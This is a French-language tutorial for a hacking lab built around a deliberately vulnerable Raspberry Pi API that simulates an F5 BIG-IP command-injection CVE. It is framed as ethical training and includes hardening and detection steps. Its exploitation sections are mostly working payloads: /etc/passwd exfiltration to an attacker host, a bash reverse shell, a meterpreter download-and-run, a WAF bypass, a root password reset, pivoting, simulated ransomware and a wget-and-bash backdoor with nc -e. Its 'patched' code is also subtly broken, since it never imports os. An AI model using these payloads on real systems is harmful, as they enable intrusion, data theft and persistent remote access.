1️⃣ Invoquer le Golem Numérique 🛠️
Transforme un Raspberry Pi en serveur vulnérable simulant F5 BIG-IP avec CVE-2025-31644. Exploite-le avec Kali, simule des attaques pro (ransomware, supply chain), et sécurise-le. LEDs clignotent à chaque hack ! 😈⚡️
Mode Noob : C’est quoi ?
Un guide pour apprendre le hacking éthique en lab, comme un jeu cyber sécurisé.
2️⃣ Comprendre CVE-2025-31644 🚨
CVE-2025-31644 : faille de command injection dans F5 BIG-IP (mode Appliance), permettant un accès root sans authentification. Signalée par @Dinosn sur X (13/05/2025), exploitée dans la nature.
Détails Techniques
- Vulnérabilité: Entrée non validée dans une API (ex.
whoami). - Impact: Accès root, compromission totale.
- Conditions: Port 443 exposé, version non patchée.
- PoC: GitHub mbadanoiu/CVE-2025-31644.
Code Vulnérable (Simulation)
# Simulation Python
def handle_management_request(request):
cmd = request.get('command')
os.system(f"/opt/f5/bin/config_util --cmd '{cmd}'") # Injection
Problème: os.system sans validation (ex. whoami;cat /etc/passwd).
3️⃣ Setup du Lab Pro 🔧
Configure un lab isolé avec une topologie réseau complexe :
+-----------------------------------------+
| [Internet simulé] |
| | |
| v |
| [Haproxy: 192.168.1.10] |
| | |
| v |
| [ModSecurity: 192.168.1.11] |
| | |
| v |
| [Raspberry Pi: 192.168.1.100] |
| | |
| v |
| [Elasticsearch: 192.168.1.12] |
| | |
| [Kali Linux: 192.168.1.101] |
+-----------------------------------------+
Variables d’Environnement
# Définir dans ~/.bashrc
export TARGET_IP=192.168.1.100
export ATTACKER_IP=192.168.1.101
export TARGET_PORT=80
Matériel et Logiciels
- Raspberry Pi 4: 4 Go RAM, SD 32 Go.
- LEDs: 3x rouges, résistances 220Ω.
- PC: VirtualBox, VMs Kali 2024.4, Haproxy, ModSecurity, Elasticsearch.
- Logiciels: Python 3.12, Flask, Nginx, Docker, Nmap, Burp Suite, Metasploit.
Configuration
- Raspberry Pi:
# IP statique sudo nano /etc/dhcpcd.conf interface eth0 static ip_address=$TARGET_IP/24 static routers=192.168.1.1 static domain_name_servers=8.8.8.8 # MàJ et install sudo apt update && sudo apt upgrade sudo apt install python3 python3-pip nginx docker.io pip3 install flask - Kali VM:
# IP: $ATTACKER_IP sudo apt install nmap burpsuite metasploit-framework lynis - Haproxy:
# Config sudo nano /etc/haproxy/haproxy.cfg frontend http-in bind *:80 default_backend servers backend servers server pi $TARGET_IP:80 sudo systemctl restart haproxy - ModSecurity:
# Config Nginx sudo nano /etc/nginx/sites-available/default server { listen 80; location / { modsecurity on; modsecurity_rules_file /etc/modsecurity/modsecurity.conf; proxy_pass http://$TARGET_IP; } } sudo systemctl restart nginx - Elasticsearch/Kibana:
docker run -p 9200:9200 -p 5601:5601 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:8.7.0
4️⃣ DIY : Construire le Serveur Vulnérable 🛠️
API Vulnérable
# app.py
from flask import Flask, request
import os
import RPi.GPIO as GPIO
import time
app = Flask(__name__)
GPIO.setmode(GPIO.BCM)
leds = [18, 23, 24]
for pin in leds:
GPIO.setup(pin, GPIO.OUT)
def alert():
for _ in range(3):
for pin in leds:
GPIO.output(pin, True)
time.sleep(0.2)
for pin in leds:
GPIO.output(pin, False)
time.sleep(0.2)
@app.route('/manage', methods=['POST'])
def manage():
cmd = request.form.get('command')
alert()
result = os.popen(cmd).read() # Vulnérable
return result
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
Circuit LED
+-------------+
| [GPIO 18]--[220Ω]--[LED]--[GND] |
| [GPIO 23]--[220Ω]--[LED]--[GND] |
| [GPIO 24]--[220Ω]--[LED]--[GND] |
+-------------+
Docker F5 BIG-IP
# Dockerfile
FROM ubuntu:22.04
RUN apt update && apt install -y nginx python3 python3-pip
RUN pip3 install flask
COPY app.py /app/app.py
COPY nginx.conf /etc/nginx/sites-available/default
EXPOSE 80
CMD ["sh", "-c", "service nginx start && python3 /app/app.py"]
# nginx.conf
server {
listen 80;
location / {
proxy_pass http://localhost:5000;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
}
}
# Build et run
docker build -t fake-f5 .
docker run -d -p 80:80 --name f5-sim fake-f5
5️⃣ Reconnaissance avec Kali 🔍
Scan Nmap
# Scan via Haproxy
nmap -sV -p- 192.168.1.10
# Résultat
PORT STATE SERVICE VERSION
80/tcp open http Haproxy 2.4.8
# Scan direct
nmap -sV -p- $TARGET_IP
# Résultat
PORT STATE SERVICE VERSION
80/tcp open http Nginx 1.18.0
5000/tcp open http Werkzeug/2.0.2 (Flask)
Burp Suite
# POST test
POST /manage HTTP/1.1
Host: $TARGET_IP
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
command=whoami
# Résultat: pi, LEDs clignotent
Bypass WAF
# [!] Bypass ModSecurity
curl -X POST http://192.168.1.11/manage -d "command=$(echo -n 'whoami' | base64) | base64 -d | bash"
6️⃣ Exploitation : Pwn le Golem 💥
Payloads
- Exfiltration:
# [!] Exfiltrer /etc/passwd curl -X POST http://$TARGET_IP:$TARGET_PORT/manage -d "command=cat /etc/passwd | curl -X POST --data-binary @- http://$ATTACKER_IP:8000/exfil" - Reverse Shell:
# [!] Lancer reverse shell curl -X POST http://$TARGET_IP:$TARGET_PORT/manage -d "command=bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'"
Metasploit
# Payload
msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4444 -f elf -o shell.elf
# Transférer
curl -X POST http://$TARGET_IP:$TARGET_PORT/manage -d "command=wget http://$ATTACKER_IP:8000/shell.elf -O /tmp/shell.elf"
# Exécuter
curl -X POST http://$TARGET_IP:$TARGET_PORT/manage -d "command=chmod +x /tmp/shell.elf && /tmp/shell.elf"
# Listener
msfconsole
use multi/handler
set payload linux/armle/meterpreter/reverse_tcp
set LHOST $ATTACKER_IP
set LPORT 4444
exploit
7️⃣ Post-Exploitation 🕵️
Exploration
sysinfo
getuid # pi
shell
whoami # pi
cat /etc/passwd
Privilege Escalation
# Simuler CVE-2025-31645
echo 'echo "root:password123" | chpasswd' > /tmp/exploit.sh
chmod +x /tmp/exploit.sh
curl -X POST http://$TARGET_IP:$TARGET_PORT/manage -d "command=sudo /usr/bin/f5_admin_tool --script /tmp/exploit.sh"
# SSH
ssh root@$TARGET_IP # password123
Pivoting
route add 192.168.2.0/24 $TARGET_IP
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.2.0/24
run
8️⃣ Purifier le Golem 🛡️
Patcher API
from flask import Flask, request
import re
app = Flask(__name__)
@app.route('/manage', methods=['POST'])
def manage():
cmd = request.form.get('command')
if not cmd or not re.match(r'^[a-zA-Z0-9\s]+$', cmd):
return "Commande invalide", 400
allowed_cmds = ['whoami', 'uptime']
if cmd not in allowed_cmds:
return "Commande non autorisée", 403
result = os.popen(cmd).read()
return result
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
Nginx Hardening
server {
listen 80;
location /manage {
if ($request_method !~ ^(POST)$ ) { return 405; }
if ($arg_command ~* "(;|\||\`|curl|wget|bash)") { return 403; }
proxy_pass http://localhost:5000;
}
}
Pare-feu
sudo apt install ufw
sudo ufw allow from $ATTACKER_IP to any port 80
sudo ufw allow from $ATTACKER_IP to any port 5000
sudo ufw enable
Détection SOC
title: F5 BIG-IP Command Injection Attempt
logsource:
product: nginx
detection:
keywords:
- "POST /manage"
- "command=*;*"
condition: keywords
9️⃣ Scénarios Réels 🧪
Ransomware
# [!] Simuler ransomware
curl -X POST http://$TARGET_IP:$TARGET_PORT/manage -d "command=tar -czf /tmp/backup.tar.gz /var/www/html && openssl aes-256-cbc -salt -in /tmp/backup.tar.gz -out /tmp/backup.enc -k mypassword"
Supply Chain
# Backdoor
from flask import Flask
app = Flask(__name__)
@app.route('/firmware/update', methods=['POST'])
def firmware_update():
os.system("wget http://$ATTACKER_IP:8000/backdoor.sh -O /tmp/update.sh && bash /tmp/update.sh")
return "Mise à jour OK"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000)
# backdoor.sh
echo "nc -e /bin/bash $ATTACKER_IP 9999" > /tmp/backdoor.sh
10️⃣ Reporting Pro 📊
Executive Summary
CVE-2025-31644 permet une command injection non authentifiée (accès root). Exploitée en lab, elle expose F5 BIG-IP à des risques critiques. Patch et WAF recommandés.
Technical Details
- CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- PoC: POST
command=whoami, reverse shell. - Timeline:
timeline title CVE-2025-31644 Exploitation 2025-05-16 14:00 : Reconnaissance NMAP 2025-05-16 14:05 : Command Injection via Burp 2025-05-16 14:10 : Reverse Shell établi
11️⃣ Checklist Éthique ⚖️
- Lab only: Test isolé.
- Légalité: Pas de cibles sans autorisation.
- Consentement: Autorisation écrite.
- Logs: Captures Burp, SIEM.
# Modèle autorisation
Je, [Nom], autorise [Ton Nom] à tester CVE-2025-31644 sur [Système] en lab. Date: [Date]. Signature: [Signature].
12️⃣ FAQ Apache ❓
Q: Tester sur un vrai F5 BIG-IP ?
A: Lab isolé avec autorisation écrite.
Q: LEDs obligatoires ?
A: Non, mais fun ! 😎
Q: WAF bloque ?
A: Encode base64 ou bypass avancé.